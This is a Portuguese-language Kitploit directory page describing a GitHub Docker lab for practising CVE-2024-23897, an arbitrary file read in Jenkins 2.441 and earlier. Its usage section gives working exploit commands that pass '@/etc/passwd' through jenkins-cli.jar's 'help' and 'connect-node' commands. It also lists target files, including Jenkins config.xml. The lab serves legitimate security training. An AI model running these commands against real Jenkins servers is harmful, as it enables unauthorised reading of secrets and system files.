Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/fineken/jenkins-cve-2024-23897-lab
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubfineken/jenkins-cve-2024-23897-lab

Jenkins-CVE-2024-23897-Lab

Ambiente de laboratório baseado em Docker para praticar a exploração de leitura arbitrária de arquivos no Jenkins (CVE-2024-23897) com scripts de ataque automatizados e manuais.

Ver Repositório
21há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Laboratório Jenkins CVE-2024-23897

Vulnerabilidade de leitura arbitrária de arquivos no Jenkins 2.441 e anteriores.

Execução

root@kitploit:~
docker-compose up -d

Ataque Automático

root@kitploit:~
docker exec -it attacker-host ./auto-exploit.sh

Ataque Manual

root@kitploit:~
docker exec -it attacker-host bash
cd /tmp
curl -o jenkins-cli.jar http://vulnerable-jenkins:8080/jnlpJars/jenkins-cli.jar

# Первая строка файла
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http help "@/etc/passwd"

# Полный файл
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http connect-node "@/etc/passwd"

Alvos

  • /etc/passwd
  • /opt/test-files/secret.txt
  • /var/jenkins_home/config.xml

Parar

root@kitploit:~
docker-compose down
Baixar ferramenta